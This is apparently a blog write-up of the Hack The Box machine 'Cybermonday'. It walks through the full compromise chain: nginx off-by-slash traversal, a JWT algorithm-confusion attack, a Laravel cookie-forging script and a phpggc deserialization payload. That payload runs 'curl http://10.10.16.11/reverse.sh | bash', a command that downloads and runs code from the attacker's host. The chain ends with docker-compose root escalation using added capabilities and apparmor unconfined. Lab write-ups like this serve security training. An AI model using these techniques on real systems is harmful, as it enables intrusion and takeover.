Cybermonday – Hack The Box


I’ve never been so challenged by a machine as much as this one. Although it is rated as hard, it’s very much an insane-like one in the amount of steps and rigamarole to go through to overcome every roadblock along the way to achieve even the smallest of progress in order to move forward. The way I defeated this box was through the first important clue I found, namely, an exposed /assets/ directory that was storing images and other site information. The server was NGINX and I abused what is called an “Off by Slash” that allows me to perform fuzzing a couple of directories after /assets/, like so:/assets../FUZZ. This allowed me to leak important internal files through a wordlist I used that was designed to leak just that. One of the important files was .env which contained a treasure trove of useful information in order to progress. From there, tinkering around with the website allowed me to see that errors were opening debugging pages which further confirmed the existence of redis and a database in the backend. Registering inside the site and logging in allowed me to see that I had profile update options which allowed me to become admin by sending a warped isAdmin=1 request. From there I made my way into the admin panel and Changelog which talked about webhooks and contained a webhooks-api-beta subdomain. Visiting that page and following the instructions on how to view, register, log-in, and create webhooks allowed me to perform an attack known as an algorithm confusion attack by using the server’s public key found at the subdomain’s /jwks.json page. I then had to convert the RS256 x-access-token given to me at login to HS256 and insert an admin role inside jwt.io. From there, I then used jwt_tool.py to craft a jwt in order to be able to create webhooks by creating a tampered RS256 token which I created by inserting in inside jwt_tool.py and supplying a couple of flags. Having successfully created the webhook I was able to make requests using the key-value pairs given to me inside the webhooks-api-beta subdomain and was able to make calls to my machine using a mix between a GET and a POST request in order to see if the requests worked. The next step was to obtain a reverse shell and I had to use redis to do so, alongside laravel cookie decryption techniques that allowed me to make this possible since cookies expired after a certain time period and had to be regenerated. The laravel cookie decryption was based on a script from HackTricks which entailed using the web app’s cookie and the app_key found in the .env file. Thereafter I had to craft a laravel_session key with phpggc that contained the payload to get a reverse shell. After sending that payload I had to refresh the site, which gave me a reverse shell as www-data inside a container. I was limited in what I could do in that container and imported a static version of nmap in order to run an internal scan on the hostname IP of the container and see the what services were running. Chisel was my friend here as I could create an encapsulated TCP session in an HTTP tunnel while securing it via SSH and relay docker’s port 5000 on my machine’s port 5000, allowing me to see the docker’s image repo name and pull the latest repository which I swam through in a terminal environment. There I discovered the source code for many functions and was able to use Chisel once again to access the database as the root user. Apparently, as the source code suggested, if one modified the default uuid’s name to path traversal characters, one could abuse the list function and list the contents of another container’s desired directory. I could also abuse the read function which allowed me to read files, which I used to read the /proc/self/environ to find out about a password that the user john was using. The user john was nowhere to be found except inside the original container I first connected to’s /mnt/.ssh/authorized_keys file where john was specified. I then ssh’d into john and made my way into the first step to unveil the privesc path, sudo -l. That revealed a python script I could run with root privileges. The code was very well written and it was not easy to spot a vulnerability but there was a leakage of information what appeared to be weak after further investigation. Crafting a malicious docker-compose file with the help of a lot of googling and ChatGPT aided me in obtaining the final result of establishing a reverse shell on the docker container by using the cybermonday_api image. There I mounted the whole root directory of the host machine and made my way into the root directory where I inserted my ssh public key, at which point at I unmounted the root directory and exited the container. I used my private ssh key to ssh into the real host machine as root and captured both flags.


NMAP


Nmap revealed 4 ports open: 22, 80, 9071, 32774. The latter two of which were not useful:


Site Inspection


Initially visiting the website gave me an error which I fixed by resetting the machine. Nevertheless, at first sight, it was interesting to read the error that was there: “READONLY You can’t write against a read only replica.”:

Everything was pointing to redis when I googled this error:

This is as useful as the debugging page got, so I reset the box to view the actual website:

Or sign up:

Upon registering, I am met with this page:

Before moving forward I wanted to fuzz for subdirectories:


Ffuf Scanning


sudo ffuf -c -w /usr/share/SecLists/Discovery/Web-Content/big.txt -u http://cybermonday.htb/FUZZ

I discovered that I could try and examine another sub-directory’s contents, “assets” as I had found it in the source code of the web app:

sudo ffuf -c -w /usr/share/SecLists/Discovery/Web-Content/big.txt -u http://cybermonday.htb/assets/FUZZ

This led to nothing because there was a catch, which I was not aware of at the time. I learned that you can do something that is common to NGINX servers which is called “Off By Slash” which is a misconfiguration that allows an attacker to read files stored outside the target folder. When a directive in NGINX does not end with a slash, it is possible to traverse one step up the path due to a missing slash. This incorrect configuration could allow an attacker to read files stored outside the target folder, that allows me to perform fuzzing a couple of directories after /assets/, like so:/assets../FUZZ, allowing me to fuzz and eventually view the files two directories above the current on where the site was hosted : http://cybermonday.htb/assets../FUZZ

sudo ffuf -c -w /usr/share/SecLists/Discovery/Web-Content/big.txt -u http://cybermonday.htb/assets../FUZZ

I tried accessing /.git but was given access denied. Even using GitDump to dump the git repository revealed no interesting files:

From here, knowing there is laravel in the app due to having explored the debugger, I proceeded with fuzzing the /assets../ directory using an internal file-names wordlist:

This output a bunch of interesting-looking files. The one most of interest was the .env one. All else that mentions .git is what I had already dumped with GitDump.

When visiting /assets../.env it downloaded a file called index.env file which, would end up being extremely useful later on, when opened, looked like so:

Next, continuing onward with the site exploration, I visited the products page displays the products:

Then, apparently, clicking on view and trying to see whether I could purchase something resulted in not clickable buy buttons.


Becoming Admin


Next, I logged back out and tried creating a new account with the first username that popped up in my head, admin. Upon doing that I obtained an SQLSTATE 23000 error which said: “SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry ‘admin’ for key ‘users.users_username_unique’”

Above, in the debugger, there is a function handling the updating of the user’s profile based on the data received in the HTTP request. Below is another snippet from the debugger detailing the user I registered as.

Here’s what’s happening step by step in the debugger function above:

  1. It retrieves data from the request, excluding the “_token,” “password,” and “password_confirmation” fields.
  2. It retrieves the user object from the database based on the authenticated user’s ID.
  3. If the request contains a password and it’s not empty:
    • It checks if the entered password and the password confirmation match. If not, it flashes an error message to the session and redirects back to the previous page.
    • If the passwords match, it hashes the new password using the bcrypt function and assigns it to the $data array.
  4. It updates the user’s data with the updated $data array.
  5. It flashes a success message to the session indicating that the profile has been updated.
  6. It redirects back to the previous page.

Overall, this code seems to be managing the process of updating a user’s profile information, including handling password changes, displaying success and error messages using session flash data, and ensuring the user’s data is securely stored using Laravel’s bcrypt function for password hashing.

So, if I were to request something like this below, where there is isAdmin=1, this should grant me the admin role on the web app.

Inside the Personal Information panel, I intercepted the account update request and before sending it over I inserted &isAdmin=yes and clicked send:

Doing this unlocked a Dashboard panel:

Visiting the Changelog page offers this:


Exploring Webhooks


Visiting the Webhook link brings me to a subdomain which I had to add to the /etc/hosts file. this file is the one I have to follow ad verbatim in order to become admin on the webhooks api. Starting from the /auth/register and all the way to /webhooks/create, and /webhooks/UUID:

From this, I wanted to register and follow the steps sequentially. Upon registering I received a success status and message. When logging in I was given an x-access-token:

I then simply followed the instruction on how to get the webhooks that I created/already existed. The default one created for tests that had a UUID of fda96d32-e8c8-4301-8fb3-c821a316cf77. I now had the ability to use the GET method to see the webhooks using the newly obtained x-access-token to do so:

curl -X GET http://webhooks-api-beta.cybermonday.htb/webhooks -H "x-access-token:eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZCI6MiwidXNlcm5hbWUiOiJkYWRhIiwicm9sZSI6InVzZXIifQ.N_KsSq6gmESa_WBBlnjowJfVTM7F-IkEs5NorQwjrf12sfBTp6fdJmc11Pt7vQVJxVsEYP2PlTil_PcXwY-L35wpjrcMqwTbBzHMHCF2i3y0rOHc4pe-BVn2kyk32JaKJJm3T4jFiqSn9S4oB6dY96_v2XVAA9maXifMaZDYxEBjK3mxiYwvYrrwfWm38jsN_6lerMtQgVj0NZWEF59in4GPHMsSxZvkOhEIDP9f1dVnMHFGZB80XPNVTECjSrAU4CaiRH95Ot3XTVxkwuSYOyZygI6cpIlgpPmUD9ctNVJ28UKBcO3QKiBc2Obvusmnw7iCEkGLz9jcUZaCR0V0ew"

Tampered JWT Tokens


From there, after a lengthy research, in order to create tokens, I found out I had to take the x-access-token (RS256) and transform it to HS256 from the algorithm drop-down menu:

Next, I had to change the role to admin instead of user while in the HS256 algorithm:

From here the situation was a bit of a curveball for me in that it was not possible to use the HS256 encoded token with the newly assigned admin role, this new role property had to be re-instated back to RS256 which is known as an algorithm confusion attack.

At first I researched a way to exploit jwt and was exposed to the algorithm confusion attack by simply browsing around:

This detailed that I needed to grab the exposed public key at the /jwks.json endpoint:

And to my surprise it was indeed there:

To now perform the algorithm confusion attack I first I needed a tool such as jwt_tool to create a pem file for me, which I’d end up using to create the RS256 algorithm jwt-tampered token. What I needed was the original x-access-token given to me upon login (before any RS256 to HS256 transformation) alongside the proper flags: -V -jw.

These would generate a pem file:

python3 /jwt_tool.py "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZCI6MiwidXNlcm5hbWUiOiJkYWRhIiwicm9sZSI6InVzZXIifQ.N_KsSq6gmESa_WBBlnjowJfVTM7F-IkEs5NorQwjrf12sfBTp6fdJmc11Pt7vQVJxVsEYP2PlTil_PcXwY-L35wpjrcMqwTbBzHMHCF2i3y0rOHc4pe-BVn2kyk32JaKJJm3T4jFiqSn9S4oB6dY96_v2XVAA9maXifMaZDYxEBjK3mxiYwvYrrwfWm38jsN_6lerMtQgVj0NZWEF59in4GPHMsSxZvkOhEIDP9f1dVnMHFGZB80XPNVTECjSrAU4CaiRH95Ot3XTVxkwuSYOyZygI6cpIlgpPmUD9ctNVJ28UKBcO3QKiBc2Obvusmnw7iCEkGLz9jcUZaCR0V0ew" -V -jw /jwks.json

Only now had I had the ability to perform the algorithm confusion attack in transforming the HS256 token with the admin role to a RS256 one through the use of the -S (algorithm) and -k (pem file) flags:

The new tampered token appeared at the bottom:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MiwidXNlcm5hbWUiOiJkYWRhIiwicm9sZSI6ImFkbWluIn0.AHfeOavNhzaFycN0-DBkpEjTwOR0xEgR7XesR8zYzEU

I then used it to create a new webhook and was met with a successful result. I had a webhook_uuid:

Attempting a sendRequest action directed at a server I was hosting on port 80 did not reproduce a callback this time around, but originally it had done so. However, a callback did occur when I used the method and url parameters:

Now I had to somehow connect the dots with redis and find a way to obtain a reverse shell. Given that from ffuf I extracted the .env file containing redis information and the app key, I decided to move onward with that and see potential pathways to exploitation.

After some research, I stumbled upon a HackTricks article detailing laravel cookie decryption.

The cookie in question was the cybermonday_session cookie found when authenticating at the main website:

Therein that Hacktricks article lied a script to decrypt the cookie using the app key found in env by providing the cybermonday_session cookie.

From this script I had to slightly iterate the last bit where decrypt was so that I could receive a print result, namely, wrap the decrypt variable with print on the outside:

import os
import json
import hashlib
import sys
import hmac
import base64
import string
import requests
from Crypto.Cipher import AES
from phpserialize import loads, dumps
#https://gist.github.com/bluetechy/5580fab27510906711a2775f3c4f5ce3
def mcrypt_decrypt(value, iv):
    global key
    AES.key_size = [len(key)]
    crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
    return crypt_object.decrypt(value)
def mcrypt_encrypt(value, iv):
    global key
    AES.key_size = [len(key)]
    crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
    return crypt_object.encrypt(value)
def decrypt(bstring):
    global key
    dic = json.loads(base64.b64decode(bstring).decode())
    mac = dic['mac']
    value = bytes(dic['value'], 'utf-8')
    iv = bytes(dic['iv'], 'utf-8')
    if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest():
        return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))
        #return loads(mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))).decode()
    return ''
def encrypt(string):
    global key
    iv = os.urandom(16)
    #string = dumps(string)
    padding = 16 - len(string) % 16
    string += bytes(chr(padding) * padding, 'utf-8')
    value = base64.b64encode(mcrypt_encrypt(string, iv))
    iv = base64.b64encode(iv)
    mac = hmac.new(key, iv+value, hashlib.sha256).hexdigest()
    dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac}
    return base64.b64encode(bytes(json.dumps(dic), 'utf-8'))
app_key ='EX3zUxJkzEAY2xM4pbOfYMJus+bjx6V25Wnas+rFMzA='
key = base64.b64decode(app_key)
print(decrypt('eyJpdiI6IkF0MjFEV2Nld1RpTGtzSVNGdjBrTEE9PSIsInZhbHVlIjoieGkrbGZDQjBYejIzNUIwcjVhdzdwWVhPWWY4eklNOXgrb3MrRE5zWEoxVW8wT0JmWExRdSszeVU0ZTJDa3lXNlY4cUdGWWRUWjd0Q0JZSjRmNFBZWEp2WU1PZ0w4dW9heTlmZ2wyYnlwTVJkeVJHOVQ5bGhFNWVZemM2M25Xd1UiLCJtYWMiOiJkN2M5YjM2OTIzMjQ4MWI4ZDMyOWZlYjE5MmE2NTRjZmIyMDY1OTljY2RiZjYxN2UwNGMzZDhmYTU5N2JiYWE5IiwidGFnIjoiIn0='))

I then had to insert the app key and the cookie (Omitting the %3D which is an URL-encoded equal sign =) inside there. Then, running that generated the output below (which varied every time because of the different login sessions). This generated a laravel_session key:


Checking Laravel_Session Key Existence


Now I had to check whether there was such a key in redis through the MIGRATE method (which took me a long time to find out about). Here I followed the manual from the official redis website and inserted something in the lines of MIGRATE 192.168.1.34 6379 "" 0 5000 KEYS key1 key2 key3 except, I inserted the destination-db (laravel_session), and instead of inserting everything after 5000, I inserted \r\n\r\n :

The request turned out something like this:

MIGRATE 10.10.16.11 6379 laravel_session:HjRlg5m1ryqfibkNDcX8vUVIHox0wQzP1idgwn02 0 5000\r\n\r\n

This gave me a successful callback on my listening 6379 port. This means that there is such a key that exists on redis.


Crafting Reverse Shell Payload


From there, I learned that I had to craft a laravel_session key with phpggc in order to get a reverse shell (immense amounts of time passed before I figured out how to craft this payload which I named “The Holy Payload“). PHPGGC is a library of payloads exploiting unsafe object deserialization. It also provides a command-line tool to generate them.

To generate the payload I had to run the following flags: –json -a

./phpggc --json -a Laravel/RCE10 system "curl http://10.10.16.11/reverse.sh | bash" 

Which output:

"O:38:\"Illuminate\\Validation\\Rules\\RequiredIf\":1:{S:9:\"condition\";a:2:{i:0;O:28:\"Illuminate\\Auth\\RequestGuard\":3 {S:8:\"callback\";S:14:\"call_user_func\";S:7:\"request\";S:6:\"system\";S:8:\"provider\";S:41:\"curl http:\/\/10.10.16.11\/reverse.sh | bash\";}i:1;S:4:\"user\";}}"

This called my bash reverse shell file on the server I was hosting on port 80, reverse.sh, and once I refreshed the website, I had obtained a reverse shell:


Exploring Container & Network Capabilities


I then imported the static version of nmap and ran an internal scan on the hostname I gathered. With this I discovered a bunch of interesting things. Running hostname -I revealed to me the IP address (172.188.0.7) assigned to this specific container on the internal network interface and is used for communication within the Docker bridge network.

Running nmap with the -sn flag alongside 172.18.0.1 gave me this output:

When you use nmap to scan for hosts on the network, you need to specify a range of IP addresses to scan. The /16 in 172.18.0.1/16 is a CIDR (Classless Inter-Domain Routing) notation, which represents a subnet mask. In this case, it means I am scanning a range of IP addresses within the 172.18.0.0 network.

Here’s what’s happening:

  • 172.18.0.7 is the IP address of the container within the 172.18.0.0/16 network.
  • When scanning 172.18.0.1/16, you are scanning all IP addresses from 172.18.0.1 to 172.18.255.255, which covers a large address range within the 172.18.0.0/16 network.
  • This is essentially telling nmap to scan for hosts within that entire range to discover other devices or containers that might be present on the Docker bridge network.

The choice of /16 is based on the network architecture and how Docker manages its networks. Docker uses bridge networks by default, and the /16 subnet mask provides a large address space for potential containers within the network. It’s a common practice to use /16 for Docker bridge networks to accommodate a significant number of containers while still keeping them isolated within the same network segment. However, one could use a different subnet mask based on your specific network requirements.

A CIDR (Classless Inter-Domain Routing) notation with /16 covers a total of 65,536 IP addresses.

Here’s the breakdown:

  • IPv4 addresses consist of 32 bits.
  • When you use /16 as the subnet mask, it means the leftmost 16 bits are fixed as the network portion, and the remaining 16 bits are variable for host addresses.
  • In binary, the first 16 bits are all ones (1s), like this: 11111111 11111111.
  • When you convert that binary to decimal, you get 255.255 for the network portion.
  • So, you have 2^16 possible combinations for the host portion, which equals 65,536.

Therefore, a /16 CIDR notation covers a total of 65,536 unique IPv4 addresses within the same network segment.


Chisel Docker Registry Port Forwarding


From here, I wanted to use chisel to create an encapsulated TCP session in an HTTP tunnel while securing it via SSH and relay docker’s port 5000, which is the docker registry’s default port (labeled as cybermonday_registry on the nmap scan), on my machine’s port 5000, allowing me to see the docker’s image repo name and pull the latest repository which I swam through in a terminal environment.

I ran this on my machine:

./chisel_1.9.1 server --port 8000 --reverse

And this on the client:

www-data@070370e2cdc4:~/html/public$ ./chisel_1.9.1 client 10.10.16.11:8000 R:5000:172.18.0.2:5000

I then needed to find the docker api’s name (which is usually in /v2/_catalog), also known as the docker image (These are things I learned along the way, I had not idea about it at the time):


Pulling Docker Images & Spawning Interactive Shell To Read Source Code Files


From here, I had learned I needed to run the command below in order to download the images from the docker registry:

sudo docker pull localhost:5000/cybermonday_api:latest

This started extracting the images like so:

Here, I needed to focus on the latest image and thus ran this command which spawned an interactive shell inside the latest image, allowing me to navigate through the files there:

sudo docker run -ti –entrypoint /bin/sh localhost:5000/cybermonday_api:latest

Within these directories’ files, 4 are important:

  1. /var/www/html/app/routes/Router.php (Source code for webhooks-api-beta.cybermonday.htb). This revealed a hidden endpoint /webhooks/:uuid/logs:

2. /var/www/html/app/controllers/LogsController.php

This file was detailing how the list and read actions worked alongside how the read action had some filtering for path traversal characters. The file also called apiKeyAuth() to see if the api was granted the rights to function:

3. /var/www/html/app/helpers/Api.php – API_KEY (22892e36-1770-11ee-be56-0242ac120002)

This is the apiKeyAuth function that /var/www/html/app/controllers/LogsController.php was calling. It contained an api key:

4. var/www/html/app/functions/webhook_actions.php (The way webhook logs functioned):

Here, the directories are the webhook names because the mkdir calls $log_path which is comprised of /logs/$webhook_name/. This means that if there are path traversal characters as the webhook name one could list and read files:


Exploiting Vuln In DB- Chisel Port Forwarding


To be able to modify values inside the db, I had to use chisel once again in order to bring over the db to my host machine as I was limited by what I could do inside the container.

To connect to DB:

Target:

./chisel_1.9.1 client 10.10.16.11:9000 R:3306:172.18.0.2:3306

My machine:

./chisel_1.9.1 server --port 9000 --reverse

Then, using the credentials I found inside the .env file, I managed to get inside. the database.:

I initially accessed the cybermonday database but the webhooks_api database was the one I was interested in so I could connect to it directly:

mysql -h 127.0.0.1 -P 3306 -u root -p webhooks_api (Password: root) (or DB=cybermonday)

To be able to list files, once in, I must update the uuid name to equal to ../ instead of tests by running:

UPDATE webhooks
SET name = '../'
WHERE uuid = 'fda96d32-e8c8-4301-8fb3-c821a316cf77';

Now, to list the files, I simply had to use the webhook used for tests alongside the action parameter. The only way to have known I had to do this was to consult the /var/www/html/app/controllers/LogsController.php file where the source code for how this function worked was listed:

This listed some files that are one directory behind the current one (outside of the container I was in – from which the web app was running).

Now, to read specific files, I had to take a different approach within burp. I had to use the read action but I had to also supply a log_name. Within the log_name field’s value, I had to insert path traversal characters (on top of the ../ that I inserted as a name in the db) that led to the /etc/passwd file.

Still inside the /var/www/html/app/controllers/LogsController.php file, I could see that there was a path traversal filtering to prevent any unwanted disclosure:

The way to bypass this was simple (For someone who knew how to do it), one had to simply insert / .. / instead of ../ because that was the filtering put in place. Notice the spaces before and after ... The server’s input validation logic appears to be checking for "../", and since there’s a space before .., it doesn’t match the pattern and allows the request to proceed.

This allowed me to read the /etc/passwd file, although of the docker container:


Finding Creds to SSH


Scouting through /proc/self/environ I was able to find a password (ngFfX2L71Nu) with which I logged into the database as dbuser this time but found nothing else of use:

This password (ngFfX2L71Nu), coupled with the username john that I found in the first container I SSHd into as www-data (inside /mnt/.ssh/authorized_keys), allowed me to SSH into the real machine hosting all the containers.


Privilege Escalation


Running sudo -l revealed the next step to becoming root:

The secure_compose.py file was the following:

#!/usr/bin/python3
import sys, yaml, os, random, string, shutil, subprocess, signal

def get_user():
    return os.environ.get("SUDO_USER")

def is_path_inside_whitelist(path):
    whitelist = [f"/home/{get_user()}", "/mnt"]

    for allowed_path in whitelist:
        if os.path.abspath(path).startswith(os.path.abspath(allowed_path)):
            return True
    return False

def check_whitelist(volumes):
    for volume in volumes:
        parts = volume.split(":")
        if len(parts) == 3 and not is_path_inside_whitelist(parts[0]):
            return False
    return True

def check_read_only(volumes):
    for volume in volumes:
        if not volume.endswith(":ro"):
            return False
    return True

def check_no_symlinks(volumes):
    for volume in volumes:
        parts = volume.split(":")
        path = parts[0]
        if os.path.islink(path):
            return False
    return True

def check_no_privileged(services):
    for service, config in services.items():
        if "privileged" in config and config["privileged"] is True:
            return False
    return True

def main(filename):

    if not os.path.exists(filename):
        print(f"File not found")
        return False

    with open(filename, "r") as file:
        try:
            data = yaml.safe_load(file)
        except yaml.YAMLError as e:
            print(f"Error: {e}")
            return False

        if "services" not in data:
            print("Invalid docker-compose.yml")
            return False

        services = data["services"]

        if not check_no_privileged(services):
            print("Privileged mode is not allowed.")
            return False

        for service, config in services.items():
            if "volumes" in config:
                volumes = config["volumes"]
                if not check_whitelist(volumes) or not check_read_only(volumes):
                    print(f"Service '{service}' is malicious.")
                    return False
                if not check_no_symlinks(volumes):
                    print(f"Service '{service}' contains a symbolic link in the volume, which is not allowed.")
                    return False
    return True

def create_random_temp_dir():
    letters_digits = string.ascii_letters + string.digits
    random_str = ''.join(random.choice(letters_digits) for i in range(6))
    temp_dir = f"/tmp/tmp-{random_str}"
    return temp_dir

def copy_docker_compose_to_temp_dir(filename, temp_dir):
    os.makedirs(temp_dir, exist_ok=True)
    shutil.copy(filename, os.path.join(temp_dir, "docker-compose.yml"))

def cleanup(temp_dir):
    subprocess.run(["/usr/bin/docker-compose", "down", "--volumes"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    shutil.rmtree(temp_dir)

def signal_handler(sig, frame):
    print("\nSIGINT received. Cleaning up...")
    cleanup(temp_dir)
    sys.exit(1)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Use: {sys.argv[0]} <docker-compose.yml>")
        sys.exit(1)

    filename = sys.argv[1]
    if main(filename):
        temp_dir = create_random_temp_dir()
        copy_docker_compose_to_temp_dir(filename, temp_dir)
        os.chdir(temp_dir)

        signal.signal(signal.SIGINT, signal_handler)

        print("Starting services...")
        result = subprocess.run(["/usr/bin/docker-compose", "up", "--build"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        print("Finishing services")

        cleanup(temp_dir)

The code was very solidly written. Here’s what it did in a nutshell:

The script is a security-focused utility for checking and running Docker Compose files. It performs several checks on the Docker Compose configuration specified in a YAML file and executes the services defined in that file if it passes the checks. Here are some of the checks it performs:

  1. Privileged Mode Check: It checks if any service is running in privileged mode (privileged: true). Privileged mode can provide elevated access within a container, which can be a security risk.
  2. Volume Whitelist Check: It checks if the volumes specified in the services are allowed based on a whitelist of paths. It restricts the use of certain paths and allows only paths within the /home/{username} and /mnt directories.
  3. Read-Only Volumes Check: It checks if the volumes are mounted as read-only (:ro). Read-only volumes prevent data from being written to the container’s filesystem.
  4. No Symbolic Links Check: It checks if any of the specified volumes contain symbolic links (symlinks). Symbolic links in volumes can potentially be used for security exploits.
  5. Temporary Directory Creation: It creates a random temporary directory and copies the Docker Compose file into it before running the services. This is done to isolate the services and their data.
  6. Signal Handling: It handles the SIGINT signal (Ctrl+C) for graceful cleanup when the script is interrupted.

I asked ChatGPT to double down on the temporary directory (Point 5.) creation:

Here is what this part of the script did:

The script deals with the creation of a temporary directory and copying the Docker Compose file into it before running the services. This step is performed to isolate the services and their data, enhancing security and avoiding potential conflicts with existing containers or data. Here’s a more in-depth explanation:

1. Random Temporary Directory:

  • The script generates a random alphanumeric string to create a unique temporary directory. This string is used as part of the temporary directory’s name.

2. Directory Creation:

  • Using the generated random string, a temporary directory is created in the /tmp directory. The path to the temporary directory is stored in the temp_dir variable.

3. Directory Isolation:

  • The temporary directory serves as an isolated environment for running the Docker Compose services.
  • This isolation helps prevent conflicts or interference with existing containers, data, or configurations on the host system.

4. Copy Docker Compose File:

  • The script copies the specified Docker Compose file (passed as a command-line argument) into the temporary directory.
  • This copy ensures that the Docker Compose file used for service execution is located within the isolated environment.

5. Change Working Directory:

  • After copying the Docker Compose file, the script changes the working directory to the temporary directory using the os.chdir() function.
  • Changing the working directory ensures that Docker Compose commands executed subsequently operate within the isolated context.

6. Signal Handling for Cleanup:

  • The script sets up a signal handler for the SIGINT signal (Ctrl+C) using signal.signal().
  • If the user interrupts the script (e.g., by pressing Ctrl+C), the signal handler initiates a cleanup process to remove the temporary directory and gracefully shut down any Docker Compose services that were started.

7. Running Docker Compose Services:

  • After all preparations are complete, the script proceeds to run the Docker Compose services within the isolated temporary directory.
  • This ensures that the services are executed in a controlled environment with a predefined Docker Compose configuration.

This led me to create a docker_compose.yml file containing a reverse shell. But further research led me to use the devices option in order to mount the entire / device in docker as a reverse shell was not going to do anything, and volumes mounting was hard to perform due to the difficulty in having to bypass all the filtering and writing permissions imposed by the code above.

My initial docker_compose file looked like so:

From there, this worked but docker fails to mount due to a permission denied message:

Searching how to bypass that I came across “Can Docker volumes be mounted from a device instead of bind mounting a directory? – Server Fault” which mentions capabilities. That pointed me to docker’s official documentation on compose files’s capabilities page “Compose file version 3 reference | Docker Docs” which detailed how full capabilities could be given to the docker_compose file I was crafting in order to bypass that permission error. Iterating my file with this change made it look like so:

Nevertheless, this generated another alert:

From this I googled “Unable to mount Read-only file system” and found this askubuntu question “Unable to mount Read-only file system” where I attempted to mount/remount /dev/sda99 to /mnt with rw permissions:

This generated another error that said /dev/sda99 is write protected. I then googled: “mount: /mnt: cannot remount read-write, is write-protected docker bypass” which brought me to this stackoverflow page discussing apparmor and how to bypass any restrictions there are in place.

HackTricks also detailed how to disable apparmor to bypass its restrictions in the same manner.

The option to add to my docker_compose file was --security-opt apparmor:unconfined

So my final payload looked like this:

Next, all I did was run secure_compose.py with my final payload file as sudo, run mount /dev/sda99 /mnt, navigate to /mnt and go to the root directory where I created a .ssh directory (as well as running chmod 700 .ssh) and inserted my public ssh key into the authorized_keys file (as well as running chmod 600 authorized_keys), unmounted /dev/sda99 to not brake the machine for other users on the same shared instance, sshd into root, and captured both flags.


COMPLETED



Leave a comment